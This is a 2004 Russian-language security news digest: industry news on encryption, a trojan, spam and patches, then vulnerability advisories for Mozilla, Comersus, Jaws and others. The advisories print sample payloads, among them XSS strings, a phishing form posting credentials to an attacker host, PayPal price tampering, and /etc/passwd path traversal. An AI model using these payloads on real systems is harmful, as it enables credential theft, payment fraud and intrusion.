Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

15 новостей по информационной безопасности каждый день


Информационный Канал Subscribe.Ru

Новости информационной безопасности Стратег.Ру
Ekey.ru Удостоверяющий Центр"

9.7.2004 - 9.7.2004

Содержание


Исследования, открытия, лабораторные разработки

Новая невзламываемая технология шифрования данных для смарт-карт

9 июля | ROL

Компания Fujitsu объявила о разработке новой технологии шифрования данных для смарт-карт, которую, наверное, можно назвать невзламываемой (если только взломщики не докажут обратное). По заявлению Fujitsu, для взлома кода, даже если привлечь для этой задачи суперкомпьютер, понадобится порядка 20 млн лет, что делает эту затею практически нереальной.

Как сообщается, новая технология от Fujitsu использует широко распространенный метод шифрования по алгоритму RSA. В данном случае в качестве кода используются 2048-значные числа, то есть вдвое более длинные, чем в других технологиях, построенных на алгоритме RSA. Правда, подобная "многозначность" имеет оборотную сторону - для обработки таких карт в картоводе потребуется довольно много времени (несколько часов). А это вряд ли понравится пользователям, Однако Fujitsu решила и эту проблему, разработав для карт новый чип, который работает с более высокой скоростью, чем обычные. Так что можно ожидать, что в скором времени Fujitsu в стране восходящего солнца появятся новые кредитные карточки с функцией цифровой подписи.

Fujitsu предлагает внедрять в изображения скрытую информацию

9 июля | www.compulenta.ru

Корпорация Fujitsu разработала технологию, которая позволяет "прятать" в графических изображениях какую-либо дополнительную информацию, например, номера телефонов или адреса веб-сайтов. Причем для человеческого глаза такая информация остается совершенно неразличимой, а считать ее можно посредством встроенных в мобильные телефоны и карманные компьютеры камер.

Работает предложенная система следующим образом. Исходное изображение разбивается на небольшие области размером 0,8 мм2 и меньше. Затем проводится анализ интенсивности желтого цвета в каждом полученном фрагменте. Наконец, на заключительном этапе на изображение накладывается нужный текст в виде точек желтого цвета соответствующей яркости. Выбор желтого цвета объясняется просто: человеческий глаз с трудом различает его оттенки, а поэтому наличие дополнительных элементов будет практически незаметно.

Область размером 1 см2 позволяет "закодировать" до двенадцати символов. При этом текст будет одинаково хорошо распознан, даже если распечатка получилась слишком темной или, напротив, бледной. Кстати, время считывания и обработки "водных меток" на КПК Fujitsu со специализированным программным обеспечением занимает около 0,4 с.

Разработчики рассчитывают, что предложенная методика позволит незаметно размещать на плакатах те или иные рекламные сведения, которые при необходимости можно быстро загрузить в память портативного устройства. А например, внедрение скрытого телефона и адреса электронной почты в визитную карточку избавит от необходимости записывать их вручную. Стоит также заметить, что подобный подход используется в стеганографии для сокрытия секретной информации.


Проблемные ситуации, информационная преступность, сетевые войны

Троян Hacdef способен обходить межсетевую защиту

9 июля | SecurityLab.ru

«Лаборатория Касперского» предупреждает о появлении в интернете новой троянской программы Hacdef, которая контролирует весь входящий трафик и пытается в нем обнаружить команды от удаленного клиента.

Троянец заражает компьютеры под управлением операционных систем Microsoft Windows NT, 2000 и XP.

Вирус состоит из двух компонентов: основного файла размером 70144 байта и библиотеки, занимающей 3328 байт.

После запуска троянец регистрируется в системном реестре и встраивает свои перехватчики во все активные процессы в памяти. Параллельно Hacdef изменяет множество системных программных интерфейсов для скрытия своего присутствия на ПК.

"Бэкдор" не открывает на пораженной машине никаких портов при запуске. Благодаря функциям перехвата и подмены API "бэкдор", контролирует весь входящий трафик и пытается обнаружить в нем команды от удаленного клиента. В случае получения правильного пароля он открывает удаленный доступ на определенном злоумышленником порту. В результате этого "бэкдор" может обойти защиту межсетевого экрана.

Доля спама занимает до 70% всей электронной почты в мире

9 июля | www.crime-research.ru

Спам в настоящее время составляет около 70% всей электронной почты в мире. Эти данные приводит американская компания MessageLabs, специализирующаяся на создании программ-фильтров.

В апреле этого года количество рассылаемого спама (в основном, рекламных объявлений) снова резко увеличилось. "Мы считаем, что к середине года доля спама возрастет до 80%", - говорит эксперт по информационной безопасности Наташа Стэли, работающая в MessageLabs.

Компания Commtouch Software, которая разрабатывает программное обеспечение для борьбы со спамом, провела исследования с намерением выяснить, какая страна является лидером в рассылке нежелательной корреспонденции.
В ходе анализа выяснилось, что доминирующее положение занимает США. 55,7% сообщений, которые засоряют почтовые ящики организаций и частных пользователей всего мира, отсылаются именно из этой страны.

Второе место по данному показателю занимает Корея - оттуда отправляется 10,2% спама. На третьем месте располагается Китай с 6,6% мирового спам-трафика.
Лидирующее место США эксперты оправдывают тем, что в стране много высокоскоростных линий соединения с Интернетом.

В начале года в США вступил в силу Акт о борьбе со спамом, но специалисты уже критикуют его за половинчатость и неэффективность. Спамеры легко приспособились к его требованиям. Закон, в частности, предусматривает, что любой отправитель электронной почты обязан указывать обратный адрес. Следует отметить, что европейское законодательство жестче американского. В ЕС рассыльщик рекламных объявлений обязан сначала спросить разрешения у адресата. В США, наоборот, адресат должен потребовать прекратить посылать ему спам. Однако, поскольку львиная доля спама создается за океаном, европейское правило фактически не действует. "Акт нуждается в доработке. В нынешнем виде он скорее создает легальные рамки для спама, чем искореняет его", -считает Наташа Стэли.

В марте American Online, Earthlink, Microsoft и Yahoo подали совместные иски против примерно 100 самых злостных спамеров. Microsoft также предложил взимать символическую плату за отправку каждого электронного письма. Это практически не отразится на обычных компьютерных пользователях, но ударит по карману спамеров, рассылающих свои послания миллионами. "Сочетание технологических и юридических методов, в конце концов, должно принести результат", - говорит Стэли.

Между тем, спам меняется не только количественно, но и качественно. По данным производителя программ-фильтров, Clearswift, доля порнографии в нем упала до 5%, зато доля финансовой информации, прежде всего, рекламы дешевых кредитов и биржевых прогнозов, возросла до 38%. На первом же месте (40%) - по-прежнему медицинская реклама.

Убытки от спама (потери рабочего времени, расходы на программы-фильтры и борьбу с занесенными вирусами) составляют в США порядка $10 млрд. в год. Соответствующая цифра для Британии - 3.2 млрд. фунтов. Об этом сообщает ВВС.


Технологии безопасности. Организации разработчики, интеграторы.

Microsoft работает над серией исправлений для Internet Explorer

9 июля | SecurityLab.ru

В пятницу Microsoft выпустила исправление, закрывающее один из трех пробелов в защите браузера, которые в совокупности позволяли злоумышленникам проникнуть в компьютер. Однако в эти выходные была обнаружена еще одна лазейка, которую заплатка Microsoft не устраняет. «Они предпочли решить только часть проблемы, — говорит студент-компьютерщик из Нидерландов Елмер Куперус, опубликовавший излечивающий код. — Остальное, вероятно, оставили на потом», сообщает Zdnet.ru.

Это уже третий случай в течение месяца, когда Microsoft приходится играть в догонялки с хакерами, обнародовавшими информацию о пробелах в защите Internet Explorer. В начале июня Куперус нашел веб-сайт, который использовал две неизвестные ранее уязвимости и одну недавно исправленную для установки на компьютеры жертв adware-программы. А на прошлой неделе была обнаружена менее опасная уязвимость, которую Microsoft исправила в ранних версиях браузера — но в более поздних версиях она появилась вновь.

Microsoft признала последнюю проблему и пообещала выпустить новые поправки в ближайшее время. «Компания работает над серией исправлений для Internet Explorer, которые выйдут в ближайшие недели и обеспечат заказчикам дополнительную защиту», — сказал CNET News.com представитель Microsoft. Кроме того, компания будет «продолжать изучать появляющиеся сообщения».

Последняя ошибка не является новостью — эксперты уже обсуждали эту проблему в январе, отмечает Куперус. Сначала ее посчитали незначительной, но это не так, потому что этот дефект можно использовать в сочетании с двумя другими, обнаруженными в начале июня. В совокупности все три пробела в защите обеспечивают простой доступ к Windows-компьютерам через браузер Internet Explorer.

«Большинство эксплойтов, которые встречаются сегодня, используют несколько уязвимостей, каждая из которых представляет собой дыру в какой-нибудь функции защиты Internet Explorer, — говорит Куперус. — По отдельности многие из этих проблем кажутся совершенно безвредными, но вместе они создают серьезный риск».

Как оригинальные, так и вновь обнаруженные дефекты относятся к библиотеке компонентов и средств поддержки сценариев ActiveX. Сначала был выявлен пробел в ADODB.Stream, а последняя ошибка кроется в компоненте Application.Shell.


Информационая безопасность бизнеса

Gartner: Модные usb устройства - серьезная угроза корпоративной безопасности

9 июля | SecurityLab.ru

Аналитики авторитетной исследовательской компании Gartner Group опубликовали отчет, в котором они предупреждают о потенциальной угрозе для корпоративной безопасности набирающих популярность мобильных USB/FireWire-устройств, предназначенных для хранения данных, в том числе так модных сечас у молодежи mp3-плейеров типа iPod, цифровых камер и т.п.

Все эти устройства очень компактны, легко преодолевают защиту периметра, с их помощью можно быстро внедрить в сеть какой-либо вирус и, наоборот, вынести критичную информацию, они могут быть легко потеряны либо украдены при использовании сотрудниками для хранения корпоративной информации.

Аналитиками Gartner подчеркивается необходимость внедрения в организациях, заботящихся о своей безопасности, четких и однозначных процедур и технологий, обеспечивающих подконтрольность использования подобных устройств - как это было в свое время с дискетами и компакт-дисками.

По утверждению Gartner, защитой может послужить ограничение как собственным, так и контрактным работникам прямого доступа к корпоративной сети с рабочих компьютеров, к которым подключено их личное оборудование. Советуется также отключить функцию Plug'n'Play после установки всех нужных для работы ПК драйверов. Таким образом, становится возможна работа только разрешенных устройств.

Однако такие меры выглядят слишком суровыми - многим фирмам в работе часто требуется использование того или иного цифрового устройства, поэтому предлагается и другой выход - использование программных средств, ограничивающих возможности устройств, подключенных к компьютеру через определенные порты.


Информационая безопасность государственной власти

Информационная разведка - задачи и возможности

9 июля | www.crime-research.ru

Наиболее законспирированная и уходящая из-под контроля "беловоротничковая" преступность действует, преимущественно, в финансово-экономической сфере, неотъемлемой частью которой является информационная среда, или же использует ее возможности при совершении целой гаммы преступлений как очевидного, так и скрытого характера.

В числе этих преступлений такие, как собственно компьютерные преступления, так и целый "букет" других: уклонение от налогов, хищения, мошенничества, совершенные путем взлома электронных систем защиты, все диффамационные деликты с использованием СМИ.

Нельзя сказать, что процессы подключения информационной среды к преступной деятельности не остались незамеченными. За последние годы различные службы криминальной милиции провели ряд успешных разработок в отношении отдельных лиц и группировок, использовавших для совершения преступлений корыстной направленности современные технические средства и действовавшие в информационной среде общества.

Одна из основных угроз – несанкционированный доступ к защищаемой информации. Пентагон, в частности, ежегодно фиксирует до 250 тысяч попыток проникновения в свои компьютерные сети. Аналитики этого ведомства считают 40 тысяч пользователей Интернет потенциальными шпионами, поскольку уровень их квалификации позволяет взламывать защитные коды и получать даже секретную информацию военного характера. В связи с этим и контрмеры принимаются адекватные. Более 500 агентов ФБР и калифорнийской полиции 18 месяцев охотились в Силиконовой долине за хакерами, похищавшими компьютерные технологии. Прямой ущерб, нанесенный только одним из четырех главарей преступников-интеллектуалов, оценивался в 19 миллионов долларов. Всего же в ходе той беспрецедентной операции было арестовано 43 кибервзломщика.

Развитие информационных технологий позволяет обрабатывать значительные массивы информации, выделяя из них сведения, представляющие разведывательный интерес (использование экспертных систем в радиоразведке, легальной разведке в СМИ и разведке в телекоммуникационной сфере и различного рода АБД); применение при ведении разработочных мероприятий значительного объема первичной, но высокодостоверной и практически не подлежащей проверке через другие источники оперативной информации, получаемой в ходе осуществления разведпоиска в информационной среде, где она проходит идентификацию и документирование с использованием аппаратно-программных средств. Эта особенность информации позволяет перехватывать и расшифровывать переговоры членов банд, устанавливать личности за позывными главарей, точные координаты, что в ряде случаев позволило предупредить террористические акты или, используя переносную компьютерную систему, подключенную через спутниковую связь к федеральным АБД, при проверках паспортного режима находить преступников, числящихся в федеральном и региональном розыске. И это только небольшой перечень решаемых задач.


Информационая безопасность общественной коммуникации, личности.

Яндекс поддержит антиспамовую технологию Microsoft

9 июля | SecurityLab.ru

Компания "Яндекс" объявила о поддержке протокола антиспамовой идентификации Caller ID, предложенного корпорацией Microsoft. Уже с 1 сентября "Яндекс" начнет рассматривать идентификатор подлинности отправителя как параметр, влияющий на работу "Спамообороны" - системы фильтрации спама, используемой "Яндексом". Компания также предлагает всем владельцам почтовых служб и провайдерам присоединиться к этому стандарту, сообщает компьюлента.

Подлинность отправителей, использующих почту "Яндекса", можно проверить уже сейчас. Для этой цели "Яндекс" поддерживает спецификации SPF (Sender Policy Framework) и Caller-ID. Стоит отметить, что в скором времени две эти технологии будут объединены, а готовый продукт получит название Sender ID. Обе системы весьма похожи и позволяют подтвердить подлинность отправителя, обратившись к серверу DNS и сверив IP-адрес, с которого было отправлено сообщение со списком почтовых серверов, в действительности соответствующих данному IP-адресу.

Такая идентификация поможет администраторам почтовых служб отличать реальные письма от посланий с подделанными обратными адресами. Поддержка протоколов идентификации отправителя уже реализована в популярных почтовых программах, а также рекомендована в предложениях ассоциации ASTA (Anti Spam Technical Alliance), в которую входят такие крупные компании, как AOL, EarthLink, Comcast, BT, Microsoft, Yahoo.

По словам менеджера проекта Яндекс.Почта Павла Завьялова, с 14 июня проверка идентификации была в тестовом режиме доступна ограниченному количеству корреспондентов почтовой службы "Яндекса". За тестовый период предложенной возможностью воспользовались 11,3% серверов, на которые распространялось тестирование.


События, семинары, конференции, даты

Начитается регистрация участников международной конференции ISDEF’2004

9 июля | SecurityLab.ru

Ассоциация ISDEF (Independent Software Development Forum) объявляет о начале регистрации начале регистрации участников 3-ей международной конференции ISDEF, которая пройдет в гостинице "Holiday Inn" (п. Виноградово, 4 км от МКАД по Дмитровскому шоссе) с 16 по 19 сентября 2004 года.

Международная конференция ISDEF – это знаковое мероприятие не только для российского, но и мирового IT – рынка (30% от мирового оборота Интернет-дистрибуции ПО составляют российские разработчики). Обсуждение задач и направлений разработки ПО, актуальная информация «из первых рук», предстоящие сделки, новые контакты, интересные проекты являются обязательными атрибутами всех конференций.

Ежегодно ISDEF собирает более 400 участников со всего мира: независимых разработчиков, представителей известных компаний – производителей ПО, журналистов, Интернет-дистрибьюторов, юристов, представителей финансовых структур, венчурных фондов, консалтинговых компаний и других участников IT-рынка.

Организатор конференции - ассоциация ISDEF, куда входят крупнейшие российские независимые разработчики ПО. Главной темой этого года объявлен маркетинг программного обеспечения. Также будут обсуждаться такие вопросы, актуальные для многих игроков IT – рынка, как рынок дистрибуции и продажи ПО через Интернет, корпоративные и OEM-продажи, новые технологии и инновации в области IT, проблема пиратства, разработка и продажа ПО для карманных компьютеров и телефонов, аутсорсинг, системы управления контентом сайтов.

Помимо российских участников, ISDEF’ 2004 планируют посетить представители зарубежных Интернет-дистрибьюторов и других компаний, заинтересованных в рынке российских разработок и продаж программного обеспечения.

ISDEF’2004 обещает стать центральным событием не только для разработчиков ПО, но и реселлеров, представителей архивов, баннерных сетей и других организаций, чьи сферы интересов касаются российского IT-рынка.


Дыры и патчи программ и операционных сред

Удаленное выполнение произвольных программ в Mozilla

9 июля | SecurityLab.ru

Программа: Mozilla 0.x-1.6, Mozilla FireFox до версии 0.9.2

Опасность: Средняя

Наличие эксплоита: Да

Описание: Уязвимость в Mozilla позволяет удаленному пользователю выполнить произвольные приложения на компьютере целевого пользователя.

Mozilla не в состоянии правильно ограничить доступ к “shell:” URI обработчику. Это позволяет Web сайту вызвать произвольные программы, сопоставленные различным расширениям. Уязвимость не позволяет передать параметры к этим программам, что снижает риск обнаруженной уязвимости.

Однако, уязвимость может эксплуатироваться в совокупности с другими ошибками в вызываемой программе, чтобы выполнить произвольный код на целевой системе. Например, можно эксплуатировать переполнение буфера в "WINDOWS\System32\grpconv.exe" программе, которой по умолчанию сопоставлено расширение “.gpr”. Но так как могут использоваться только Unicode символы, эксплуатация уязвимости сильно затруднена.

Уязвимость воздействует на Mozilla, Mozilla Firefox, и Mozilla Thunderbird на Microsoft Windows XP платформах, так как “shell:” URI обработчик используется только в Windows XP.

Пример:

<a href=shell:windows\\system32\\calc.exe>1</a>

URL производителя: http://www.Mozilla.org/

Решение: Установите последние версии уязвимых программ: Mozilla 1.7.1
http://ftp.mozilla.org/pub/mozil...ozilla-win32-1.7.1-installer.exe

Mozilla Firefox 0.9.2
http://ftp.mozilla.org/pub/mozil...ses/0.9.2/FirefoxSetup-0.9.2.exe

Mozilla Thunderbird 0.7.2
http://ftp.mozilla.org/pub/mozil...0.7.2/ThunderbirdSetup-0.7.2.exe

DoS против Nokia 3560 телефонов

9 июля | SecurityLab.ru

Программа: Nokia 3560

Опасность: Средняя

Наличие эксплоита: Нет

Описание: Уязвимость в Nokia 3560 телефонах позволяет удаленному пользователю вызвать отказ в обслуживании.

Удаленный пользователь может послать специально сформированное текстовое сообщение к целевому пользователю, чтобы аварийно завершить работу телефона. Для восстановления нормальной работы потребуется отключение батарей.

При получении злонамеренного сообщения, телефон не сообщает о получении нового сообщения и не сохраняет злонамеренное сообщение.

URL производителя: http://www.nokia.com/

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время.

Несколько уязвимостей в Ethereal

9 июля | SecurityLab.ru

Программа: Ethereal 0.8.15-0.10.4

Опасность: Высокая

Наличие эксплоита: Нет

Описание: Несколько уязвимостей обнаружено в Ethereal в the iSNS, SMB, и SNMP диссекторах. Удаленный пользователь может аварийно завершить работу Ethereal процесса и может выполнить произвольный код на целевой системе.

1. Уязвимость в iSNS анализаторе позволяет аварийно завершить работу Ethereal или выполнить произвольный код на системе.

2. Уязвимость в SMB анализаторе позволяет удаленному пользователю аварийно завершить работу приложения, когда включена SID snooping и не определено имя политики для обработчика.

3. Уязвимость в SNMP анализаторе может использоваться для аварийного завершения работы приложения через специально обработанную community сторку.

URL производителя> http://www.ethereal.com/appnotes/enpa-sa-00015.html

Решение: Установите обновленную версию программы (0.10.5): http://www.ethereal.com/download.html

Неавторизованный доступ в Zoom X3 ADSL модеме

9 июля | SecurityLab.ru

Программа: Zoom X3 ADSL Modem

Опасность: Средняя

Наличие эксплоита: Да

Описание: Уязвимость конфигурации в Zoom X3 ADSL модеме позволяет удаленному пользователю получить доступ к некоторым параметрам конфигурации.

По умолчанию, модем позволяет удаленному пользователю подключится к 23 (telnet), 80(http), 254 и 255 портам.

Удаленный пользователь может подключится к 254 порту, и пароль по умолчанию чтобы получить доступ к некоторым установкам на устройстве, даже если пароль был изменен. Система выдает следующий баннер:

 "ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.27"
Уязвимость может воздействовать на другие модемы, использующие Conexant чип.

URL производителя: http://www.zoom.com/products/adsl_overview.html

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время

Межсайтовый скриптинг в NPDS

9 июля | SecurityLab.ru

Опасность: Низкая

Наличие эксплоита: Да

Описание: Уязвимость в NPDS позволяет удаленному пользователю выполнить XSS нападение.

Эксплоит: См. Источник сообщения.

URL производителя: http://www.npds.org/

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время

Несколько уязвимостей в Comersus

9 июля | SecurityLab.ru

Программа: Comersus 5.09

Опасность: Средняя

Наличие эксплоита: Да

Описание: Несколько уязвимостей обнаружено в Comersus. Удаленный пользователь может выполнить XSS нападение и изменять цену покупки.

1. XSS:

ttp://[VICTIM]/comersus/store/comersus_message.asp?message=<meta%20http-equiv='refresh'content='0'> 

http://[VICTIM]/comersus/store/comersus_message.asp? message=<form%20action="
http://www.evilhacker.com/save2db.asp"%20method="post">Username:<input%20nam
e="username"%20type="text"%20maxlength="30"><br>Password:<input%20 name="pass
word"%20type="text"%20maxlength="30"><br><input%20name="login"%20type="submi
t"%20value="Login"></form>

http://[VICTIM]/comersus/backofficeLite/comersus_b ackoffice_message.asp?message=<script>alert("VULNERABLE_TO_XSS")</script>
2. Удаленный пользователь может изменять цену покупки, перед оплатой товара через PayPal.
http://[VICTIM]/comersus/store/comersus_gatewayPayPal.asp?idOrder=2002&Order
Total=|102|222|228|22|130|36| 209&name=Thomas&lastName=Ryan&address=123+Easy+
Modify+Street&city=New+York&state=NY&zip=10001&country=US&phone=212%2D857%2D
1731&email=tommy%40providesecurity%2Ecom&or derDetails=1x+%23RDHT%2F11+Red+Ha
t+Deluxe+WorkStation+Options%3A+%3D+%2479%2E00%0D%0A2x+%23WME%2F1+Windows+Mi
llennium+Edition+Options%3A+%3D+%24398%2E00%0D%0A1x+%23BP RES2%2F6+So+You+Wan
t+to+Be+President%3F+Options%3A+%3D+%2414%2E39%0D%0A

URL производителя: http://www.comersus.com/

Решение: Установите обновленную версию программы (5.098): http://www.comersus.com/download.html

Несколько уязвимостей в Jaws

9 июля | SecurityLab.ru

Программа: Jaws 0.3

Опасность: Высокая

Наличие эксплоита:

Описание: Несколько уязвимостей обнаружено в Jaws. Удаленный пользователь может получить административный доступ. Удаленный пользователь может просматривать файлы на целевой системе. Удаленный пользователь может также определить инсталляционный путь и выполнить XSS нападение.

1. Удаленный пользователь может получить административный доступ к целевому приложению из за логической ошибки в функции logged_on(). Удаленный пользователь может установить специально обработанное значение Куки к MD5 хешу или нулевому значению, чтобы получить доступ через admin.php сценарий.

2. Просмотр произвольных файлов:

 http://127.0.0.1/jaws/index.php?gadget=././././././. ././././etc/passwd%00&path=/etc
3. Определение инсталляционного пути:
 http://127.0.0.1/jaws/index.php?gadget=filebrowser&path=/etc
4. Раскрытие инсталляционного пути:
 http://127.0.0.1/jaws/include/config.php
5. XSS:
http://127.0.0.1/jaws/index.php?gadget=[a valid gadget]&action=<b>bold letter</b>

http://127.0.0.1/jaws/index.php?gadget=[a valid gadget]&action=<script>alert('Colombia Rulx!!');</script>

URL производителя: http://www.jaws.com.mx/

Решение: Установите обновленную версию программы (0.3).

Раскрытие информации в Google GMail

9 июля | SecurityLab.ru

Программа: Google GMail

Опасность: Низкая

Наличие эксплоита: Да

Описание: Уязвимость в Google GMail позволяет удаленному пользователю определить информацию о другом пользователе, пытающимся зарегистрироваться в системе.

Удаленный пользователь может вызвать сценарий '/accounts/CheckAvailability' чтобы заставить систему отобразить информацию (имя и фамилию целевого пользователя), относящуюся к запросу другого пользователя.

URL производителя: http://gmail.google.com/

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время




Инструменты управления содержанием Метод.ру
Дата создания документа: 17:10 09.07.04

http://subscribe.ru/
E-mail: ask@subscribe.ru
Адрес подписки
Отписаться

В избранное